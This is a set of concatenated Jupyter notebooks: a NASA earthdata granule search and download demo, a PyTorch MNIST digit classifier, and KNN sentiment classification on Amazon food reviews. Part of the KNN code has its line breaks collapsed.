print(granules[0:2])
# -

# ## Pretty printing data granules
#
# Since we are in a notebook we can take advantage of it to see a more user friendly version of the granules with the built-in function `display`
# This will render browse image for the granule if available and eventually will have a similar representation as the one from the Earthdata search portal

# printing 2 granules using display
[display(granule) for granule in granules[0:2]]

# ### Spatiotemporal queries
#
# Our granules and collection classes accept the same spatial and temporal arguments as CMR so we can search for granules that match spatiotemporal criteria.

Query = DataGranules().short_name("ATL03").temporal("2020-03-01", "2020-03-30").bounding_box(-134.7,58.9,-133.9,59.2).version("005")
# Always inspect the hits before retrieving the granule metadata, just because it's very verbose.
print(f"Granules found: {Query.hits()}")

# Now we can print some info about these granules using the built-in methods
granules = Query.get(4)
data_links = [{'links': g.data_links(), 'size (MB):': g.size()} for g in granules]
data_links

# +
# More datasets to try
# C1908348134-LPDAAC_ECS: GEDI L2A Elevation and Height Metrics Data Global Footprint Level V002
# C1968980609-POCLOUD: Sentinel-6A MF Jason-CS L2 P4 Altimeter Low Resolution (LR) STC Ocean Surface Topography
# C1575731655-LPDAAC_ECS: ASTER Global Digital Elevation Model NetCDF V003

# Query = DataGranules(auth).short_name('ATL03').version("005")
Query = DataGranules().short_name('ATL03').version("005").bounding_box(-134.7,58.9,-133.9,59.2)
# Query = DataGranules().concept_id("C1575731655-LPDAAC_ECS").bounding_box(-134.7,58.9,-133.9,59.2)
print(f"Granules found: {Query.hits()}")
# -

# Not all granules have data previews, if they have the granule class will show up to 2 preview images while using Jupyter's display() function
granules = Query.get(10)
[display(g) for g in granules[0:5]]

# Granules are python dictionaries, with fancy nested key/value notation and some extra built-in methods.
granules[0]["umm.TemporalExtent.RangeDateTime"]

# Size in MB
data_links = [{'links': g.data_links(), 'size (MB):': g.size()} for g in granules]
data_links

# ## **Accessing the data**
#
# The cloud is not something magical, but having infrastructure on-demand is quite handy to have on many scientific workflows, especially if the data already lives in "the cloud".
# As for NASA, a data migration started in 2020 and will continue on the foreseeable future. Not all but most of NASA data will be available on AWS object storage system or S3.
#
# To work with this data the first thing we need to do is to get the proper credentials for accessing data on their S3 buckets. These credentials are on a per-DAAC basis and last a mere 1 hour. In the near future the Auth class will keep track of this to regenerate the credentials as needed.
#
# With `earthdata` a researcher can get the files regardless if they are on-prem or cloud based with the same API call, although an important consideration is that if we want to access data in the cloud we must run the code in the cloud. This is because some S3 buckets are configured to only allow direct access (s3:// links) if the requester is in the same zone, `us-west-2`.

# ## On-prem access 📡
#
# DAAC hosted data

# If we want to start the notebook from here we need to execute this cell and uncomment the lines below
# Accessing does not necessarily mean downloading, especially in the cloud.
from earthdata import Auth, DataGranules, DataCollections, Store
auth = Auth().login(strategy="netrc")
store = Store(auth)

Query = DataGranules().concept_id("C1997321091-NSIDC_ECS").bounding_box(-134.7,54.9,-100.9,69.2)
print(f"Granule hits: {Query.hits()}")

# getting more than 6,000 metadata records for demo purposes is going to slow us down a bit so let's get only 100
granules = Query.get(100)
granules[0]

# Does this granule belong to a cloud-based collection?
granules[0].cloud_hosted

# since the response is an array of dictionaries we can do pythonic things like ordering the granules by size
import operator
granules_by_size = sorted(granules, key=operator.itemgetter("size"))
# now our array is sorted by size from less to more. Let's print the first 10
granules_by_size[0:3]

# %%time
# accessing the data on prem means downloading it if we are in a local environment or "uploading them" if we are in the cloud.
files = store.get(granules_by_size[0:2], "./data/demo-atl03")

# ## Cloud access ☁️
#
# Same API, just a different place

Query = DataGranules().concept_id("C1968980609-POCLOUD").bounding_box(-134.7,54.9,-100.9,69.2)
print(f"Granule hits: {Query.hits()}")
cloud_granules = Query.get(100)

# is this a cloud hosted data granule?
cloud_granules[0].cloud_hosted

# Let's pretty print this
print(cloud_granules[0])

# +
# data_links = cloud_granules[0].data_links(s3_only=True)
https_links = []
s3_links = []
for granule in cloud_granules[0:10]:
    https_links.append(granule.data_links()[0])
    s3_links.append(granule.data_links(s3_only=True)[0])
https_links
# -

# Let's order them by size again.
import operator
cloud_granules_by_size = sorted(cloud_granules, key=operator.itemgetter("size"))
# now our array is sorted by size from less to more. Let's print the first 10
cloud_granules_by_size[0:3]

# +
# %%time
# If we get an error with direct_access=True, most likely is because we are running this code outside the us-west-2 region.
# Downloading cloud collection outside us-west-2 causes egress costs to NASA.
try:
    files = store.get(https_links, direct_access=False, local_path="./data/demo-POCLOUD")
except Exception as e:
    # We're probably not in us-west-2
    print(f"Error: {e}")

# +
# %%time
# If we get an error with direct_access=True, most likely is because we are running this code outside the us-west-2 region.
# Downloading cloud collection outside us-west-2 causes egress costs to NASA.
try:
    files = store.get(cloud_granules_by_size[0:3], direct_access=True, local_path="./data/demo-POCLOUD")
except Exception as e:
    # We're probably not in us-west-2
    print(f"Error: {e}")
# -

# ## Recap
#
# ```python
# from earthdata import Auth, DataGranules, DataCollections, Accessor
# auth = Auth().login()
# access = Accessor(auth)
#
# Query = DataGranules(auth).concept_id("C1575731655-LPDAAC_ECS").bounding_box(-134.7,58.9,-133.9,59.2)
# granules = Query.get(10)
# # preview the data granules
# granules
# # get the files
# files = access.get(granules)
#
# ```
#
# **Wait, we said 4 lines of Python**
#
# ```python
#
# from earthdata import Auth, DataGranules, Accessor
# auth = Auth().login()
# granules = DataGranules().concept_id("C1575731655-LPDAAC_ECS").temporal("2020-03-01", "2020-03-30").bounding_box(-134.7,58.9,-133.9,59.2).get_all()
# files = Accessor(auth).get(granules, local_path='./data')
#
# # Now to the important science!
# ```

# ### Related links
#
# **CMR** API documentation: https://cmr.earthdata.nasa.gov/search/site/docs/search/api.html
#
# **EDL** API documentation: https://urs.earthdata.nasa.gov/
#
# NASA OpenScapes: https://nasa-openscapes.github.io/earthdata-cloud-cookbook/
#
# NSIDC: https://nsidc.org
notebooks/Demo.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# +
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python

import numpy as np  # linear algebra
import pandas as pd  # data processing, CSV file I/O (e.g. pd.read_csv)
import os

# List the available input files.
print(os.listdir("../New folder (2)"))

# Any results you write to the current directory are saved as output.

# +
import pandas as pd
import torch

# MNIST-style CSV: first column is the label, remaining 784 columns are pixel values.
dataset = pd.read_csv("train.csv", dtype=np.float32)
targets_numpy = dataset.label.values
features_numpy = dataset.loc[:, dataset.columns != 'label'].values

# +
# Scale pixel intensities from [0, 255] to [0, 1].
features_numpy = features_numpy / 255

# +
print(len(features_numpy), len(targets_numpy))

# +
# First 20000 rows for training, the remainder for validation.
train_features_numpy, train_labels_numpy = features_numpy[:20000], targets_numpy[:20000]
print(len(train_features_numpy), len(train_labels_numpy))

# +
valid_features_numpy, valid_labels_numpy = features_numpy[20000:], targets_numpy[20000:]
print(len(valid_features_numpy), len(valid_labels_numpy))

# +
# Labels must be LongTensor for CrossEntropyLoss.
train_features = torch.from_numpy(train_features_numpy)
train_labels = torch.from_numpy(train_labels_numpy).type(torch.LongTensor)

# +
valid_features = torch.from_numpy(valid_features_numpy)
valid_labels = torch.from_numpy(valid_labels_numpy).type(torch.LongTensor)

# +
import torchvision.transforms as transforms
from torchvision import datasets

train = torch.utils.data.TensorDataset(train_features, train_labels)
test = torch.utils.data.TensorDataset(valid_features, valid_labels)

train_loaders = torch.utils.data.DataLoader(dataset=train, batch_size=64, shuffle=True)
test_loaders = torch.utils.data.DataLoader(dataset=test, batch_size=64, shuffle=True)

# +
import matplotlib.pyplot as plt

# Sanity-check one sample image with its label as the title.
plt.imshow(features_numpy[2].reshape(28, 28))
plt.axis("off")
plt.title(str(targets_numpy[2]))
plt.savefig('graph.png')
plt.show()

# +
import torch.nn as nn
import torch.nn.functional as F


class Network(nn.Module):
    """Two-layer fully connected classifier: 784 -> 400 -> 10 logits."""

    def __init__(self):
        super(Network, self).__init__()
        self.fc1 = nn.Linear(28 * 28, 400)
        self.fc2 = nn.Linear(400, 10)

    def forward(self, x):
        x = F.relu(self.fc1(x))
        x = self.fc2(x)  # raw logits; CrossEntropyLoss applies log-softmax itself
        return x


# +
model = Network()

# +
# Use the GPU when one is available; keep a flag so every later .cuda() call is
# guarded consistently. (Bug fix: the original called model.cuda() again,
# unconditionally, just before the training loop, which crashes on CPU-only
# machines.)
use_cuda = torch.cuda.is_available()
if use_cuda:
    model.cuda()

# +
import torch.optim as optim

criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=0.001)

# +
from torch.autograd import Variable

epochs = 150
count = 0
loss_list = []
iteration_list = []
model.train()

# Bug fix: the original wrote `for epochs in range(epochs)`, shadowing the
# epoch count with the loop index; use a distinct name.
for epoch in range(epochs):
    for i, (images, labels) in enumerate(train_loaders):
        model.train()
        batch = Variable(images.view(-1, 28 * 28))
        labels = Variable(labels)
        if use_cuda:
            batch, labels = batch.cuda(), labels.cuda()
        optimizer.zero_grad()
        outputs = model(batch)
        loss = criterion(outputs, labels)
        loss.backward()
        optimizer.step()
        count += 1
        # Every 50 iterations, measure accuracy on the validation loader.
        # (count starts at 1, so the original's extra `count != 0` check was redundant.)
        if count % 50 == 0:
            correct = 0
            total = 0
            for image, label in test_loaders:
                if len(image) == len(label):
                    val_batch = Variable(image.view(-1, 28 * 28))
                    if use_cuda:
                        val_batch = val_batch.cuda()
                        label = label.cuda()
                    model.eval()
                    output = model(val_batch)
                    predicted = torch.max(output.data, 1)[1]
                    total += len(label)
                    correct += (predicted == label).sum()
            accuracy = 100 * correct / float(total)
            # .item() stores a plain float instead of a tensor that keeps
            # autograd bookkeeping alive (the original appended loss.data).
            loss_list.append(loss.item())
            iteration_list.append(count)
            if count % 500 == 0:
                # Print Loss
                print('Iteration: {} Loss: {} Accuracy: {}%'.format(count, loss.item(), accuracy))
# -

model.eval()

testset = pd.read_csv("test.csv", dtype=np.float32)
test_numpy = testset.values
test_numpy = test_numpy / 255
print(len(test_numpy))
test_features = torch.from_numpy(test_numpy)

plt.imshow(testset.values[2].reshape(28, 28))
plt.axis("off")
plt.title("something")
plt.savefig('graph.png')
plt.show()

# Move the model back to the CPU for the single-sample inference below.
model.cpu()

feat = Variable(test_features[2].view(-1, 28 * 28))
output = model(feat)
predicted = torch.max(output.data, 1)[1]
print(predicted.numpy()[0])

# Predict every test row (one sample at a time, as in the original; batching
# the whole tensor through the model would be faster but yields the same output).
key = []
value = []
for i in range(len(test_features)):
    feat = Variable(test_features[i].view(-1, 28 * 28))
    output = model(feat)
    predicted = torch.max(output.data, 1)[1]
    key.append(i + 1)
    value.append(predicted.numpy()[0])

print(len(key), len(value))

op = 2
print(key[op], value[op])

submission = pd.DataFrame({'ImageId': key, 'Label': value})
submission.head()
submission.to_csv("digit_recognizer3.csv", index=False)
print(len(key), len(value))
print(len(submission))
Digit-Recognizer.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: 'Python 3.7.7 64-bit (''ml1'': conda)'
#     name: python37764bitml1condab1e7a9cc0a4b4da2aa1261f0c90e368a
# ---

# +
import string
import re
import pickle
import random
from statistics import mean
from statistics import stdev
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# %matplotlib inline
from tqdm import tqdm
import sqlite3
import prettytable
from sklearn.utils import resample
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import TimeSeriesSplit
from sklearn.metrics import accuracy_score
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
from sklearn.metrics import confusion_matrix
from sklearn.metrics import plot_confusion_matrix
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import cross_val_score
from sklearn.utils.class_weight import compute_class_weight
import gensim
import nltk
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.stem import PorterStemmer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn import metrics

# + tags=[]
# Load the pre-computed text featurizations of the review corpus from pickles:
# unigram BOW, bigram BOW, n-gram TF-IDF, averaged word2vec and TF-IDF-weighted
# word2vec. Each variable name is reused for both the file handle and the
# loaded array.
with open('../datafiles/pickles/affr_bow_500','rb') as affr_bow_500:
    affr_bow_500 = pickle.load(affr_bow_500).toarray()
print(affr_bow_500.shape,affr_bow_500[0])
print('----------------------------------------------------------------------------------------------------------------------------------------------')
with open('../datafiles/pickles/affr_bigram_bow_500','rb') as affr_bigram_bow_500:
    affr_bigram_bow_500 = pickle.load(affr_bigram_bow_500).toarray()
print(affr_bigram_bow_500.shape,affr_bigram_bow_500[0])
print('----------------------------------------------------------------------------------------------------------------------------------------------')
with open('../datafiles/pickles/affr_ngram_tfidf_500','rb') as affr_ngram_tfidf_500:
    affr_ngram_tfidf_500 = pickle.load(affr_ngram_tfidf_500).toarray()
print(affr_ngram_tfidf_500.shape,affr_ngram_tfidf_500[0])
print('----------------------------------------------------------------------------------------------------------------------------------------------')
with open('../datafiles/pickles/avg_w2v','rb') as avg_w2v:
    avg_w2v = np.array(pickle.load(avg_w2v))
print(avg_w2v.shape,avg_w2v[0])
print('----------------------------------------------------------------------------------------------------------------------------------------------')
with open('../datafiles/pickles/tdifd_weighted_w2v','rb') as tdifd_weighted_w2v:
    tdifd_weighted_w2v = np.array(pickle.load(tdifd_weighted_w2v))
print(tdifd_weighted_w2v.shape,tdifd_weighted_w2v[0])
print('----------------------------------------------------------------------------------------------------------------------------------------------')
# Pre-trained word2vec model for the same corpus.
w2v_model = gensim.models.Word2Vec.load("../datafiles/pickles/w2v_model.model")
# -

# Quick sanity check of the word2vec embeddings.
w2v_model.wv.most_similar('like')

# Amazon fine-food reviews; score 3 (neutral) reviews are excluded so the task
# becomes binary sentiment classification.
conn = sqlite3.connect('../datafiles/amazon_reviews.sqlite')
data = pd.read_sql_query(""" SELECT * FROM Reviews WHERE Score!=3""",conn)

def scr(s):
    # Map review score to a binary label: >3 is positive (1), <3 is negative (0).
    if(s>3):
        return 1
    else:
        return 0
data['Score'] = data['Score'].apply(scr)

# De-duplicate repeated reviews and drop rows with inconsistent helpfulness
# counts (numerator cannot exceed denominator).
cus_data = data.drop_duplicates(subset={'UserId','ProfileName', 'Time', 'Text'},keep='first')
cus_data = cus_data[cus_data['HelpfulnessNumerator']<=cus_data['HelpfulnessDenominator']]
cus_data.reset_index(drop=True,inplace=True)
Scr = cus_data['Score'].copy()

# + tags=[]
df = pd.DataFrame(avg_w2v)
df['Y'] = cus_data['Score']
# NOTE(review): this reset_index is NOT in-place, so its result is discarded —
# it likely was intended to be inplace=True (or reassigned); confirm before relying on df's index.
df.reset_index(drop=True)
# ###################### BALANCING A SECTION OF DATA
#################################### dataa = df.iloc[10000:15000].copy() df_mino = dataa[dataa['Y']==0].copy() df_majo = dataa[dataa['Y']==1].copy() df_minority_upsampled = resample(df_mino,replace=True,n_samples=df_majo.shape[0],random_state=123) df_upsampled = pd.concat([df_majo, df_minority_upsampled]) # - df_upsampled['Y'].value_counts() # - We have to take the data leak into consideration, as if we first convert the text into vectors and then split into test and train then the test will kind off be built with the use of features of the train data. so to avoid such data leackage we need to spilt fist then vectorize the text. # + tags=[] class Knn: def __init__(self,X,Y,splits=5,algorithm='auto',balance=1,scale=0,istext=0,textPreprocessing='BOW'): self.X = np.array(X) self.Y = np.array(Y) self.splits = splits self.algorithm = algorithm self.scale = scale self.istext = istext self.textPreprocessing = textPreprocessing if(istext == 1 and (textPreprocessing =='BOW' or textPreprocessing =='TFIDF')): self.X = np.array(self.text_preprocessing1(self.X)) elif(istext == 1 and (textPreprocessing =='AVG-W2V')): self.X = np.array(self.text_preprocessing2(self.X)) elif(istext == 1 and (textPreprocessing =='TFIDF-W2V')): self.X = np.array(self.text_preprocessing3(self.X)) if(balance == 1): self.Balance() def KNN_TS(self,hyper = list(range(1,100,2))): self.type = 0 self.X_train_n_cv, self.X_test, self.Y_train_n_cv, self.Y_test = train_test_split(self.X,self.Y,test_size=0.3,random_state=0) if(self.scale == 1): self.Scale() tscv = TimeSeriesSplit() TimeSeriesSplit(max_train_size=None, n_splits=self.splits) scrs = list() auroc_score = dict() self.roc_auc_stats = list() for n in tqdm(hyper): cv_fold_score = list() train_fold_score = list() auroc_fold_score = list() # this score is from the cross-validation dataset auroc_fold_score_proba = list() # this is also from cv dataset auroc_fold_train = list() # this is from train dataset for train_index, cv_index in 
tscv.split(self.X_train_n_cv): X_train,Y_train = self.X_train_n_cv[train_index],self.Y_train_n_cv[train_index] X_cv,Y_cv = self.X_train_n_cv[cv_index],self.Y_train_n_cv[cv_index] model = KNeighborsClassifier(n_neighbors = n, algorithm = self.algorithm) X_train,X_cv = self.vectorize(X_train,X_cv,self.textPreprocessing) model.fit(X_train,Y_train) y_cv_pred_proba = model.predict_proba(X_cv)[:,1] y_cv_pred = model.predict(X_cv) cv_fold_score.append(model.score(X_cv,Y_cv)) train_fold_score.append(model.score(X_train,Y_train)) auroc_fold_score_proba.append(roc_auc_score(Y_cv,y_cv_pred_proba)) auroc_fold_score.append(roc_auc_score(Y_cv,y_cv_pred)) auroc_fold_train.append(roc_auc_score(Y_train,model.predict_proba(X_train)[:,1])) scrs.append([n,mean(cv_fold_score),mean(train_fold_score),mean(auroc_fold_score),mean(auroc_fold_score_proba)]) auroc_score[n] = mean(auroc_fold_score_proba) self.roc_auc_stats.append([n,mean(auroc_fold_train),stdev(auroc_fold_train),mean(auroc_fold_score_proba),stdev(auroc_fold_score_proba)]) max_roc_score = max(auroc_score.values()) scrs = pd.DataFrame(data = scrs,columns=['K','CV score','Train score','AUROC','AUROC with probability']) optimal_k = max(auroc_score, key=auroc_score.get) self.scrs = scrs self.max_roc_score = max_roc_score self.optimal_k = optimal_k self.op_model = KNeighborsClassifier(n_neighbors = optimal_k,algorithm = self.algorithm) self.X_train_n_cv,self.X_train_n_cv = self.vectorize(self.X_train_n_cv,self.X_train_n_cv,self.textPreprocessing) self.op_model.fit(self.X_train_n_cv,self.Y_train_n_cv) return self.op_model def KNN_KCV(self,hyper = list(range(1,100,10))): self.type = 1 self.X = pd.DataFrame(self.X) self.Y = pd.DataFrame(self.Y) self.X_train_n_cv, self.X_test, self.Y_train_n_cv, self.Y_test = train_test_split(self.X,self.Y,test_size=0.25,random_state=0) if(self.scale == 1): self.Scale() indx = list(self.X_train_n_cv.index) random.shuffle(indx) split = [indx[i::self.splits] for i in range(self.splits)] scrs = list() 
auroc_score = dict() self.roc_auc_stats = list() for n in tqdm(hyper): cv_fold_score = list() train_fold_score = list() auroc_fold_score = list() auroc_fold_score_proba = list() auroc_fold_train = list() for j in range(1,self.splits+1): X_train = self.X_train_n_cv.loc[list(set(self.X_train_n_cv.index)-set(split[j-1]))] Y_train = self.Y_train_n_cv.loc[list(set(self.X_train_n_cv.index)-set(split[j-1]))] X_cv = self.X_train_n_cv.loc[split[j-1]] Y_cv = self.Y_train_n_cv.loc[split[j-1]] model = KNeighborsClassifier(n_neighbors = n, algorithm = self.algorithm) X_train,X_cv = self.vectorize(X_train,X_cv,self.textPreprocessing) model.fit(X_train,Y_train) y_cv_pred_proba = model.predict_proba(X_cv)[:,1] y_cv_pred = model.predict(X_cv) cv_fold_score.append(model.score(X_cv,Y_cv)) train_fold_score.append(model.score(X_train,Y_train)) auroc_fold_score_proba.append(roc_auc_score(Y_cv,y_cv_pred_proba)) auroc_fold_score.append(roc_auc_score(Y_cv,y_cv_pred)) auroc_fold_train.append(roc_auc_score(Y_train,model.predict_proba(X_train)[:,1])) scrs.append([n,mean(cv_fold_score),mean(train_fold_score),mean(auroc_fold_score),mean(auroc_fold_score_proba)]) auroc_score[n] = mean(auroc_fold_score_proba) self.roc_auc_stats.append([n,mean(auroc_fold_train),stdev(auroc_fold_train),mean(auroc_fold_score_proba),stdev(auroc_fold_score_proba)]) max_roc_score = max(auroc_score.values()) scrs = pd.DataFrame(data = scrs,columns=['K','CV score','Train score','AUROC','AUROC with probability']) optimal_k = max(auroc_score, key=auroc_score.get) self.max_roc_score = max_roc_score self.scrs = scrs self.optimal_k = optimal_k self.op_model = KNeighborsClassifier(n_neighbors = optimal_k,algorithm = self.algorithm) self.X_train_n_cv,self.X_test = self.vectorize(self.X_train_n_cv,self.X_test,self.textPreprocessing) self.op_model.fit(self.X_train_n_cv,self.Y_train_n_cv) return self.op_model def recent_score(self): return self.op_model.score(self.X_test,self.Y_test) def Scale(self): sc = StandardScaler() if 
(self.type==1): self.X_train_n_cv = pd.DataFrame(sc.fit_transform(self.X_train_n_cv),index=self.X_train_n_cv.index) self.X_test = pd.DataFrame(sc.transform(self.X_test),index=self.X_test.index) else: self.X_train_n_cv = sc.fit_transform(self.X_train_n_cv) self.X_test = sc.transform(self.X_test) def Plot_roc(self): y_probability = self.op_model.predict_proba(self.X_test) fpr, tpr, threshold = roc_curve(self.Y_test, y_probability[:,1]) roc_auc = roc_auc_score(self.Y_test, y_probability[:,1]) plt.title('Receiver Operating Characteristic Test data') plt.plot(fpr, tpr, 'b', label = 'AUC = %0.2f' % roc_auc) plt.legend(loc = 'lower right') plt.plot([0, 1], [0, 1],'r--') plt.xlim([0, 1]) plt.ylim([0, 1]) plt.ylabel('True Positive Rate') plt.xlabel('False Positive Rate') plt.title('ROC Curve of kNN') plt.show() def Plot_CV_roc_score(self): rocstats = np.array(self.roc_auc_stats) sns.set_style("darkgrid") sns.set_palette(sns.color_palette("Dark2", 2)) sns.lineplot(y=rocstats[:,1],x=rocstats[:,0],label = "Train AUROC") sns.lineplot(y=rocstats[:,3],x=rocstats[:,0],label = "CV AUROC") plt.fill_between(x=rocstats[:,0],y1=rocstats[:,3]+rocstats[:,4],y2=rocstats[:,3]-rocstats[:,4],color="#ffd1b3") plt.fill_between(x=rocstats[:,0],y1=rocstats[:,1]+rocstats[:,2],y2=rocstats[:,1]-rocstats[:,2],color="#B4EEB4") plt.title("ROC score of Train and CV data set with it's spanning standard deviation") plt.ylabel('ROC score') plt.xlabel('K as hyperparameter') def Plot_CV_scrs(self): trn_err = self.scrs['Train score'].apply(lambda x: 1-x,1) cv_err = self.scrs['CV score'].apply(lambda x: 1-x,1) sns.lineplot(y='CV score',x='K',data=self.scrs) sns.lineplot(y='Train score',x='K',data=self.scrs) fig = plt.figure() sns.lineplot(y=cv_err,x='K',data=self.scrs) sns.lineplot(y=trn_err,x='K',data=self.scrs) def Confusion_mat(self): plot_confusion_matrix(self.op_model, self.X_train_n_cv, self.Y_train_n_cv) plot_confusion_matrix(self.op_model, self.X_test, self.Y_test) plt.show() def Balance(self): 
ubal_data = pd.DataFrame(self.X) ubal_data['Y'] = self.Y ubal_mino = ubal_data[ubal_data['Y']==0].copy() ubal_majo = ubal_data[ubal_data['Y']==1].copy() ubal_mino_balanced = resample(ubal_mino,replace=True,n_samples=ubal_majo.shape[0],random_state=123) ubal_balanced = pd.concat([ubal_majo, ubal_mino_balanced]) self.X = np.array(ubal_balanced.iloc[:,:-1]) self.Y = np.array(ubal_balanced['Y']) return ubal_balanced def cln_html(self,sen): clnd = re.sub(r'<.*?>',r' ',sen) return clnd def cln_punc(self,sen): clnd = re.sub(r'[?|!|\'|"|#]',r'',sen) clnd = re.sub(r'[.|,|)|(|\|/]',r' ',clnd) return clnd def text_preprocessing1(self,textdata): stop = set(stopwords.words('english')) sno = nltk.stem.SnowballStemmer('english') i=0 str1=' ' final_string=[] s='' for sent in textdata: filtered_sentence=[] sent=self.cln_html(sent) for w in sent.split(): for cleaned_words in self.cln_punc(w).split(): if((cleaned_words.isalpha()) & (len(cleaned_words)>2)): if(cleaned_words.lower() not in stop): s=(sno.stem(cleaned_words.lower())).encode('utf8') filtered_sentence.append(s) else: continue else: continue str1 = b" ".join(filtered_sentence) final_string.append(str1) i+=1 return final_string def text_preprocessing2(self,textdata): list_of_sent=[] for sent in textdata: filtered_sentence=[] sent=self.cln_html(sent) for w in sent.split(): for cleaned_words in self.cln_punc(w).split(): if(cleaned_words.isalpha()): filtered_sentence.append(cleaned_words.lower()) else: continue list_of_sent.append(filtered_sentence) return list_of_sent def text_preprocessing3(self,textdata): text1 = self.text_preprocessing1(textdata) text2 = self.text_preprocessing2(textdata) x = pd.DataFrame({'BOW':text1,'TFIDF':text2}) return x.to_numpy() def vectorize(self,traindata,testdata,kind): if(self.istext==1): traindata = pd.DataFrame(traindata) testdata = pd.DataFrame(testdata) if(kind=='BOW'): bow = CountVectorizer(ngram_range=(1,2),max_features=500) train_bow = bow.fit_transform(pd.Series(traindata.iloc[:,0])) 
test_bow = bow.transform(pd.Series(testdata.iloc[:,0])) return train_bow,test_bow ############################################################################## elif(kind=='TFIDF'): tf_idf=TfidfVectorizer(ngram_range=(1,2),max_features=500) train_tdidf=tf_idf.fit_transform(pd.Series(traindata.iloc[:,0])) test_tdidf=tf_idf.transform(pd.Series(testdata.iloc[:,0])) return train_tdidf,test_tdidf ############################################################################## elif(kind=='AVG-W2V'): w2v_model=gensim.models.Word2Vec(pd.Series(traindata.iloc[:,0]),min_count=5,size=50, workers=4) i=0 train_vectors = []; for sent in pd.Series(traindata.iloc[:,0]): sent_vec = np.zeros(50) cnt_words =0; for word in sent: try: vec = w2v_model.wv[word] sent_vec += vec cnt_words += 1 i=i+1 except: pass sent_vec /= cnt_words train_vectors.append(sent_vec) i=0 test_vectors = []; for sent in pd.Series(testdata.iloc[:,0]): sent_vec = np.zeros(50) cnt_words =0; for word in sent: try: vec = w2v_model.wv[word] sent_vec += vec cnt_words += 1 i=i+1 except: pass sent_vec /= cnt_words test_vectors.append(sent_vec) return train_vectors,test_vectors ############################################################################## elif(kind=='TFIDF-W2V'): w2v_model=gensim.models.Word2Vec(pd.Series(traindata.iloc[:,1]),min_count=5,size=50, workers=4) tf_idf=TfidfVectorizer(max_features=500) tf_idf_vec = tf_idf.fit_transform(pd.Series(traindata.iloc[:,0])) tfidf_feat = tf_idf.get_feature_names() tf_idf_vec2 = tf_idf.transform(pd.Series(testdata.iloc[:,0])) train_vectors = [] row=0 for sent in pd.Series(traindata.iloc[:,1]): sent_vec = np.zeros(50) weight_sum =0 for word in sent: try: vec = w2v_model.wv[word] tfidf = tf_idf_vec[row, tfidf_feat.index(word)] sent_vec += (vec * tfidf) weight_sum += tfidf except: pass sent_vec /= weight_sum train_vectors.append(sent_vec) row += 1 train_df=pd.DataFrame(train_vectors) train_df.fillna(train_df.mean(),inplace=True) test_vectors = [] row=0 for sent in 
pd.Series(testdata.iloc[:,1]): sent_vec = np.zeros(50) weight_sum =0 for word in sent: try: vec = w2v_model.wv[word] tfidf = tf_idf_vec2[row, tfidf_feat.index(word)] sent_vec += (vec * tfidf) weight_sum += tfidf except: pass sent_vec /= weight_sum test_vectors.append(sent_vec) row += 1 test_df=pd.DataFrame(test_vectors) test_df.fillna(test_df.mean(),inplace=True) # test_df.dropna(inplace=True) # print(test_df.shape) return train_df,test_df else: return traindata,testdata else: return traindata,testdata # + tags=[] knn = Knn(cus_data.iloc[23000:25000,9],cus_data.iloc[23000:25000,6],balance=1,scale=0,istext=1,textPreprocessing='TFIDF-W2V') # knn = Knn(cus_data.iloc[22000:25000,9],cus_data.iloc[22000:25000,6],balance=1,scale=0) # + tags=[] knn.KNN_KCV(hyper=list(range(1,100,10))) # - knn.recent_score() knn.Confusion_mat() knn.Plot_CV_roc_score() knn.Plot_CV_scrs() pd.DataFrame(bow.toarray()) tet = knn.Balance() # + tags=[] knn.KNN_TS() # - knn.op_model.score(knn.X_test,knn.Y_test) knn.Plot_CV_scrs() # knn = Knn(tdifd_weighted_w2v,Scr[0:1000]) knn = Knn(avg_w2v[11000:12000],Scr[11000:12000]) # - ### Trying out diff. folds in kfold-cv. # + tags=[] omodel = knn.KNN_KCV() # - knn.Plot_CV_roc_score() # + tags=[] scores,auc,ok = knn.KNN_KCV(5) # - knn.Plot_scrs() # + tags=[] scores,auc,ok = knn.KNN_KCV(20) # - knn.Plot_scrs() # - Here we are doing gridsearch on Knn with the balanced data set (this was befor when we added the Balance() function in our KNN class) x1,x2,y1,y2 = train_test_split(df_upsampled.iloc[:,:50],df_upsampled.iloc[:,50],test_size=0.3,random_state=0) clf = GridSearchCV(estimator=KNeighborsClassifier(),param_grid={'n_neighbors':list(range(1,100,3))},cv=10) clf.fit(x1,y1) clf.best_estimator_ clf.cv_results_; plot_confusion_matrix(clf.best_estimator_,x2,y2) compute_class_weight(class_weight = 'balanced',classes=[0,1],y=Scr[11000:12000]) # - ### This is testing different accuracies for different datasets(diff. portions of datasets) and diff. 'n' in knn. 
# + tags=[]
# Coarse log-scale sweep of k with avg-word2vec features (10k-review slice).
for k in tqdm([1, 10, 100, 1000]):
    fold_scores = cross_val_score(KNeighborsClassifier(k), avg_w2v[10000:20000], Scr[10000:20000], cv=5)
    print(fold_scores.mean())

# + tags=[]
# Finer sweep over the same avg-w2v slice.
k_grid = range(1, 1000, 100)
for k in tqdm(k_grid):
    fold_scores = cross_val_score(KNeighborsClassifier(k), avg_w2v[10000:20000], Scr[10000:20000], cv=5)
    print(fold_scores.mean())

# + tags=[]
# Log-scale sweep on bag-of-words features (smaller 5k slice).
for k in tqdm([1, 10, 100, 1000]):
    fold_scores = cross_val_score(KNeighborsClassifier(k), affr_bow_500[10000:15000], Scr[10000:15000], cv=5)
    print(fold_scores.mean())

# + tags=[]
# Finer sweep on a 3k avg-w2v slice.
k_grid = range(1, 400, 50)
for k in tqdm(k_grid):
    fold_scores = cross_val_score(KNeighborsClassifier(k), avg_w2v[10000:13000], Scr[10000:13000], cv=5)
    print(fold_scores.mean())

